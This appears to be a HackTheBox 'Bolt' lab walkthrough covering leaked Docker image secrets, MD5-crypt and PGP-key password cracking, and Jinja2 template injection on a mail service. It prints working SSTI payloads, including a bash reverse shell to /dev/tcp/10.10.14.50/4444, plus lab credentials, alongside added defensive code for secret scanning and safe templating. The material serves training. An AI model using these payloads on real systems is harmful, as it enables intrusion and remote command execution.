[HTB Series] Bolt
2022-2-9 22:13:46 Author: mp.weixin.qq.com

0x01 Information Gathering

─# nmap 10.10.11.114 -p- -sC -sV --min-rate=2000
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 08:34 EST
Nmap scan report for 10.10.11.114
Host is up (0.31s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
|   256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_  256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title:     Starter Website -  About 
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
| http-title: Passbolt | Open source password manager for teams
|_Requested resource was /auth/login?redirect=%2F
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after:  2022-02-24T19:11:23
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.73 seconds

The website has yet another login page, and it also lets you create an account. Tried it; it fails with an error.

Opening the download reveals several virtual machine images, and they leak some information.

0x02 Vulnerability Discovery

# cat repositories                                                         
{"flask-dashboard-adminlte_appseed-app":{"latest":"3350815d3bdf21771408f91da4551ca6f4e82edce74e9352ed75c2e8a5e68162"}}

This says the latest version is xxx. Under the directory app/base/__pycache__ there are two .pyc files. Decompiled, the code is as follows:

 pip3 install uncompyle6 -i https://pypi.tuna.tsinghua.edu.cn/simple/ 

Treat this as a tip. The decompiled output is still not quite the original source; I later found the real source and paste it below.

# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""

from flask import jsonify, render_template, redirect, request, url_for
from flask_login import (
    current_user,
    login_required,
    login_user,
    logout_user
)

from app import db, login_manager
from app.base import blueprint
from app.base.forms import LoginForm, CreateAccountForm
from app.base.models import User

from hmac import compare_digest as compare_hash
import crypt


@blueprint.route('/')
def route_default():
    return redirect(url_for('base_blueprint.login'))


## Login & Registration

@blueprint.route('/login', methods=['GET', 'POST'])
def login():
    login_form = LoginForm(request.form)
    if 'login' in request.form:

        # read form data
        username = request.form['username']
        password = request.form['password']

        # Locate user
        user = User.query.filter_by(username=username).first()

        # Check the password
        # NB: user.password is read before the `if user` test, so an unknown
        # username raises AttributeError on None instead of a clean failure.
        stored_password = user.password
        stored_password = stored_password.decode('utf-8')
        if user and compare_hash(stored_password, crypt.crypt(password, stored_password)):
            login_user(user)
            return redirect(url_for('base_blueprint.route_default'))

        # Something (user or pass) is not ok
        return render_template('accounts/login.html', msg='Wrong user or password', form=login_form)

    if not current_user.is_authenticated:
        return render_template('accounts/login.html', form=login_form)
    return redirect(url_for('home_blueprint.index'))


@blueprint.route('/register', methods=['GET', 'POST'])
def register():
    login_form = LoginForm(request.form)
    create_account_form = CreateAccountForm(request.form)
    if 'register' in request.form:

        username = request.form['username']
        email = request.form['email']
        data = User.query.filter_by(email=email).first()
        # NB: as reconstructed here, nothing is returned when `data` already
        # exists, so Flask raises an error for a duplicate email.
        if data is None:
            # Check usename exists
            user = User.query.filter_by(username=username).first()
            if user:
                return render_template('accounts/register.html',
                                       msg='Username already registered',
                                       success=False,
                                       form=create_account_form)

            # Check email exists
            user = User.query.filter_by(email=email).first()
            if user:
                return render_template('accounts/register.html',
                                       msg='Email already registered',
                                       success=False,
                                       form=create_account_form)

            # else we can create the user
            # NB: every submitted form field is passed straight into the model.
            user = User(**request.form)
            db.session.add(user)
            db.session.commit()

            return render_template('accounts/register.html',
                                   msg='User created please <a href="/login">login</a>',
                                   success=True,
                                   form=create_account_form)

    else:
        return render_template('accounts/register.html', form=create_account_form)


@blueprint.route('/logout')
def logout():
    logout_user()
    return redirect(url_for('base_blueprint.login'))


## Errors

@login_manager.unauthorized_handler
def unauthorized_handler():
    return render_template('page-403.html'), 403


@blueprint.errorhandler(403)
def access_forbidden(error):
    return render_template('page-403.html'), 403


@blueprint.errorhandler(404)
def not_found_error(error):
    return render_template('page-404.html'), 404


@blueprint.errorhandler(500)
def internal_error(error):
    return render_template('page-500.html'), 500
└─# cat forms.py
# uncompyle6 version 3.8.0
# Python bytecode 3.6 (3379)
# Decompiled from: Python 3.9.7 (default, Sep 24 2021, 09:43:00) 
# [GCC 10.3.0]
# Embedded file name: /app/base/forms.py
# Compiled at: 2021-03-05 12:48:36
# Size of source mod 2**32: 791 bytes
"""Copyright (c) 2019 - present AppSeed.us"""
from flask_wtf import FlaskForm
from wtforms import TextField, PasswordField
from wtforms.validators import InputRequired, Email, DataRequired


class LoginForm(FlaskForm):
    username = TextField('Username', id='username_login', validators=[DataRequired()])
    password = PasswordField('Password', id='pwd_login', validators=[DataRequired()])


class CreateAccountForm(FlaskForm):
    username = TextField('Username', id='username_create', validators=[DataRequired()])
    email = TextField('Email', id='email_create', validators=[DataRequired(), Email()])
    password = PasswordField('Password', id='pwd_create', validators=[DataRequired()])
# okay decompiling forms.cpython-36.pyc

There is a lot here, so first look at what matters. List the contents of every layer archive:

import glob, subprocess
a = glob.glob("*/layer.tar")          # every layer archive unpacked from the image
for i in a:
    subprocess.run(["tar", "-tvf", i])  # list only; nothing is extracted yet

A few files of interest:

a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar
-rw-r--r-- root/root     16384 2021-03-05 12:44 db.sqlite3
2265c5097f0b290a53b7556fd5d721ffad8a4921bfc2a6e378c04859185d27fa/layer.tar
-rw-r--r-- root/root       791 2021-03-05 12:48 app/base/forms.py
-rw-r--r-- root/root      3778 2021-03-05 12:49 app/base/routes.py
745959c3a65c3899f9e1a5319ee5500f199e0cadf8d487b92e2f297441f8c5cf/layer.tar
-rw-r--r-- root/root       142 2021-03-05 06:11 .env
-rw-r--r-- root/root      1448 2021-03-05 09:22 config.py
-rw-r--r-- root/root       198 2021-03-05 06:11 gunicorn-cfg.py
-rw-r--r-- root/root       116 2021-03-05 07:40 requirements.txt
-rw-r--r-- root/root       955 2021-03-05 06:11 run.py

config.py contains an SQLite3 connection string and the username and password for a PostgreSQL database:

    # config() is python-decouple's reader: env var first, then the default
    #PostgreSQL database
    SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(
        config( 'DB_ENGINE'   , default='postgresql'    ),
        config( 'DB_USERNAME' , default='appseed'       ),
        config( 'DB_PASS'     , default='pass'          ),
        config( 'DB_HOST'     , default='localhost'     ),
        config( 'DB_PORT'     , default=5432            ),
        config( 'DB_NAME'     , default='appseed-flask' )
    )
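The leak above comes from files baked into an image layer. As an added example (not the box's or AppSeed's code), here is a small stdlib-only scanner that walks a layer.tar in memory and flags sensitive paths and credential-looking assignments such as DB_PASS and SECRET_KEY; the demo layer, its file contents and the placeholder values are all constructed for the example.

```python
import io
import re
import tarfile

# File names that should never ship inside an application image (tuned to what this box leaked).
SENSITIVE_PATH = re.compile(r"(^|/)(\.env|config\.py|db\.sqlite3|__pycache__/.*\.pyc)$")

# Credential-looking assignments; group 1 captures the value. Constructed patterns.
SECRET_PATTERNS = (
    ("db-password", re.compile(r"DB_PASS\W+(?:default\s*=\s*)?['\"]([^'\"]+)['\"]")),
    ("flask-secret-key", re.compile(r"SECRET_KEY\W+(?:default\s*=\s*)?['\"]([^'\"]+)['\"]")),
)


def scan_layer(layer_tar: bytes) -> list:
    """Walk one layer.tar and return (member, label, value) findings without extracting to disk."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(layer_tar), mode="r:") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            if SENSITIVE_PATH.search(member.name):
                findings.append((member.name, "sensitive-path", ""))
            # Only grep text-like files; sqlite and pyc need their own parsers.
            if member.size > 1_000_000 or member.name.endswith((".sqlite3", ".pyc")):
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            for label, pattern in SECRET_PATTERNS:
                for m in pattern.finditer(text):
                    findings.append((member.name, label, m.group(1)))
    return findings


def build_demo_layer() -> bytes:
    """Constructed in-memory layer.tar shaped like the leaked one; the values are placeholders."""
    files = {
        "config.py": (
            "SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(\n"
            "    config( 'DB_ENGINE'   , default='postgresql'   ),\n"
            "    config( 'DB_PASS'     , default='PLACEHOLDER_PASSWORD' ),\n"
            ")\n"
            "SECRET_KEY = config('SECRET_KEY', default='PLACEHOLDER_KEY')\n"
        ),
        ".env": "DEBUG=True\nSECRET_KEY='PLACEHOLDER_KEY'\n",
        "app/base/routes.py": "# application code, no secrets\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()
```

Run scan_layer over each layer.tar of a real image before it is published; anything it flags should be moved into runtime environment variables or secrets storage.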

admin   [email protected]  $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.

That is the password hash. The login route shows how the password is hashed and compared:

        # read form data
        username = request.form['username']
        password = request.form['password']

        # Locate user
        user = User.query.filter_by(username=username).first()

        # Check the password
        stored_password = user.password
        stored_password = stored_password.decode('utf-8')
        if user and compare_hash(stored_password, crypt.crypt(password, stored_password)):
            login_user(user)
            return redirect(url_for('base_blueprint.route_default'))

Per the code logic, the key step is the lookup by username, which yields a user object. Login succeeds if the user exists and crypt() of the submitted password, using the stored hash itself as the salt argument, compares equal to the stored hash. I was baffled at first; it works because crypt() only reads the $1$<salt>$ prefix from the salt argument, so hashing the right password reproduces the stored value. Cracking the hash gives:

admin/deadbolt
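To make the crypt() check concrete, and to show what the route gets wrong, here is an added example (not the app's code): a reference MD5-crypt ($1$) implementation standing in for the crypt module (deprecated and removed in Python 3.13), a crypt-like wrapper that parses the salt from the stored hash, and a hardened verify function. The USERS table is constructed from the admin hash above.

```python
import hashlib
from hmac import compare_digest

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v: int, n: int) -> str:
    # Emit n characters of the crypt alphabet, least significant 6 bits first.
    return "".join(ITOA64[(v >> (6 * i)) & 0x3F] for i in range(n))


def md5crypt(password: str, salt: str) -> str:
    """MD5-crypt ($1$) as glibc crypt() computes it; the salt is at most 8 characters."""
    pw, sp = password.encode(), salt[:8].encode()
    ctx = hashlib.md5(pw + b"$1$" + sp)
    alt = hashlib.md5(pw + sp + pw).digest()
    pl = len(pw)
    while pl > 0:
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):  # fixed 1000 rounds: cheap to brute-force, which is why this hash fell fast
        c1 = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c1.update(sp)
        if i % 7:
            c1.update(pw)
        c1.update(final if i & 1 else pw)
        final = c1.digest()
    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    return "$1$" + sp.decode() + "$" + out + _to64(final[11], 2)


def crypt_with_setting(password: str, setting: str) -> str:
    """Mimics crypt.crypt(password, stored_hash): the salt is taken from the $1$<salt>$ prefix,
    so hashing the correct candidate with the stored hash as 'salt' reproduces the stored hash."""
    parts = setting.split("$")
    if len(parts) < 3 or parts[1] != "1":
        raise ValueError("only $1$ (MD5-crypt) settings are handled here")
    return md5crypt(password, parts[2])


def verify_login(users: dict, username: str, password: str) -> bool:
    """Hardened form of the route's check: an unknown user is rejected before anything is
    dereferenced (the original read user.password first), and the compare is constant-time."""
    stored = users.get(username)
    if stored is None:
        return False
    return compare_digest(stored, crypt_with_setting(password, stored))


# Constructed user table holding the admin hash recovered from the leaked db.sqlite3 above.
USERS = {"admin": "$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q."}
```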

At this point it felt like there was nothing more to find.

Scanning for vhosts turned up two subdomains: demo and mail.

So now there are three sites:

demo.bolt.htb      # a login page; accounts can be created but an invite code is required
mail.bolt.htb      # a login page
passbolt.bolt.htb  # AdminLTE3

config.py also sets a SECRET_KEY: default='S#perS3crEt_007'

Tried it; no luck.

After a long search, found the invite code:

'XNSS-HSJW-3NGU-8XTJ'

curl -i -s -k -X $'POST' \
  -H $'Host: demo.bolt.htb' \
  --data-binary $'\x0d\x0ausername=123&[email protected]&password=123&invite_code=XNSS-HSJW-3NGU-8XTJ' \
  $'http://demo.bolt.htb/register'

After registering, the same account can log in to mail, which appears to be a mail server.

Once logged in to the mail service, I noticed that changing a profile setting triggers an email notification. Since the stack is Python, I tried template injection.

After submitting, a new email arrived in which the arithmetic probe had been evaluated to 10000, confirming an SSTI vulnerability in the name parameter.

{{"".__class__.__bases__[0].__subclasses__()}}

Popen is the 223rd entry (index 222):


{{"".__class__.__bases__[0].__subclasses__()[222]}}
<class 'subprocess.Popen'>

Calling its __init__ directly did not work:

{{"".__class__.__bases__[0].__subclasses__()[222].__init__}}
<slot wrapper '__init__' of 'object' objects>

Since the template engine is Jinja2, I searched for a known payload:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen("whoami").read()}}
www-data
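The root cause is that the notification email builds its template source from the user-controlled name. As an added example (not the mail application's code), the vulnerable pattern next to the fixed one, plus a cheap input-side check; the greeting text and the probe value are constructed for the example, and jinja2 is assumed to be installed.

```python
from jinja2 import BaseLoader, Environment

# autoescape=True neutralises HTML in rendered values; it does not, by itself, stop SSTI.
env = Environment(loader=BaseLoader(), autoescape=True)


def notify_vulnerable(name: str) -> str:
    """The SSTI-prone pattern: user input is concatenated into the template SOURCE,
    so Jinja2 evaluates any {{ ... }} the user typed (this is what produced 10000)."""
    return env.from_string("Hello " + name + ", your settings were updated.").render()


def notify_safe(name: str) -> str:
    """The fix: the template source is a constant and the name is passed as a VARIABLE,
    so braces inside it are plain text and nothing user-supplied is ever compiled."""
    return env.from_string("Hello {{ name }}, your settings were updated.").render(name=name)


def looks_like_template_syntax(value: str) -> bool:
    """Detection hook for fields that should never contain template delimiters; log and
    alert on these in profile-update requests rather than silently rendering them."""
    return any(token in value for token in ("{{", "}}", "{%", "%}"))


PROBE = "{{100*100}}"  # constructed stand-in for the arithmetic probe used on this box
```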

0x03 Getting a Foothold

Send a reverse-shell payload the same way:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1"').read() }}
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.11.114] 50808
bash: cannot set terminal process group (1012): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bolt:~/demo$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bolt:~/demo$ whoami
whoami
www-data

0x04 Privilege Escalation

www-data@bolt:~/demo$ cat /etc/passwd|grep -v nologin |grep -v false
cat /etc/passwd|grep -v nologin |grep -v false
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash
clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash

www-data -> eddie

[-] /etc/init/ config file permissions:
total 24
drwxr-xr-x   2 root root  4096 Sep  9 10:07 .
drwxr-xr-x 135 root root 12288 Sep 20 15:05 ..
-rw-r--r--   1 root root  1757 Nov  6  2019 mysql.conf
-rw-r--r--   1 root root   453 Dec  2  2020 whoopsie.conf

[-] Any interesting mail in /var/mail:
total 24
drwxrwsr-x  3 root     mail 4096 Dec 17 00:27 .
drwxr-xr-x 15 root     root 4096 Aug  4 13:06 ..
drwx--S---  5     5001 mail 4096 Dec 19 08:23 123
-rw-------  1 eddie    mail  909 Feb 25  2021 eddie
-rw-------  1 root     mail    1 Mar  3  2021 root
-rw-------  1 www-data mail    1 Mar  3  2021 www-data

Nothing exploitable found there.

Search for files owned by the current user:

www-data@bolt:/var/lib/passbolt/tmp$ find /etc -user www-data 2>/dev/null
find /etc -user www-data 2>/dev/null
/etc/passbolt/Seeds

passbolt.php contains a password, rT2;jW7<eY8!dX8}pQ8%. The relevant part of the file:

return [
    'App' => [
        // A base URL to use for absolute links.
        // The url where the passbolt instance will be reachable to your end users.
        // This information is needed to render images in emails for example
        'fullBaseUrl' => 'https://passbolt.bolt.htb',
    ],

    // Database configuration.
    'Datasources' => [
        'default' => [
            'host' => 'localhost',
            'port' => '3306',
            'username' => 'passbolt',
            'password' => 'rT2;jW7<eY8!dX8}pQ8%',
            'database' => 'passboltdb',
        ],
    ],

Connected to the database; not much of importance in it.

select * from users;
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+
| id                                   | role_id                              | username       | active | deleted | created             | modified            |
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+
| 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | [email protected] |      1 |       0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 |
| 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 | [email protected] |      1 |       0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 |
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+

There is also something odd, an ASCII-armored PGP message:

-----BEGIN PGP MESSAGE-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

[armored ciphertext omitted]
-----END PGP MESSAGE-----

eddie -> root

OpenPGP is an encryption tool.

Compared with before, we now have one more password, the database one. Try it to switch users.

It works for the user eddie.

In eddie's mailbox there is a message from the user Clark that mentions the password management system and backing up the private key. The email:

eddie@bolt:/var/mail$ cat eddie
cat eddie
From [email protected]  Thu Feb 25 14:20:19 2021
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by bolt.htb (Postfix, from userid 1001)
        id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)
Subject: Important!
To: <[email protected]>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20210225212019[email protected]>
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)
From: Clark Griswold <[email protected]>

Hey Eddie,

The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account.

Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...

-Clark

Also found a reference to CVE-2021-22555.

Searched GitHub and tried one; it did not work. Come back to it later.

One more piece of information:

══════════╣ Do I have PGP keys?
/usr/bin/gpg                                                                                                                                        
netpgpkeys Not Found
netpgp Not Found  

What is PGP?

https://gist.github.com/jhjguxin/6037564

If you are not familiar with it, test locally first.


══╣ Possible private SSH keys were found!
/etc/ImageMagick-6/mime.xml
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js
/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log

In that log file there are three public keys and one private key. The private key:

-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

[armored key material omitted]
=cqxZ
-----END PGP PRIVATE KEY BLOCK-----

The PGP message in the database is ciphertext that this key should decrypt.

As is well known, private keys usually have a passphrase, so try cracking it.

  • Use gpg2john

└─# gpg2john pri.key > tmp
File pri.key
# cat tmp
Eddie Johnson:$gpg$*1*668*2048*[hash body omitted]*3*254*8*9*16*b81f0847e01fb836c8cc7c8a2af31f19*16777216*34af9ef3956d5ad8:::Eddie Johnson <[email protected]>::pri.key
  • Crack it

┌──(root💀kali)-[~/tmp]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt tmp
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 16777216 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 8 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
merrychristmas   (Eddie Johnson)
1g 0:00:13:03 DONE (2021-12-20 11:05) 0.001277g/s 54.71p/s 54.71c/s 54.71C/s mhines..menudo
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Decrypt the message with the imported key and the cracked passphrase:

gpg --batch --import /tmp/pri.key
gpg --pinentry-mode loopback --passphrase merrychristmas -d /tmp/pub.key
{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}

Switch user to root with this password; root access obtained.



Source: https://mp.weixin.qq.com/s?__biz=MzU3MTU3NDk4Mw==&mid=2247485021&idx=1&sn=991b0f92a605120c903342d5c0d2c2d4&chksm=fcdf59f5cba8d0e3f881d60f3f2d026d582e6daf0463a031f572b5c2f801af3c40284ca22df4&scene=58&subscene=0#rd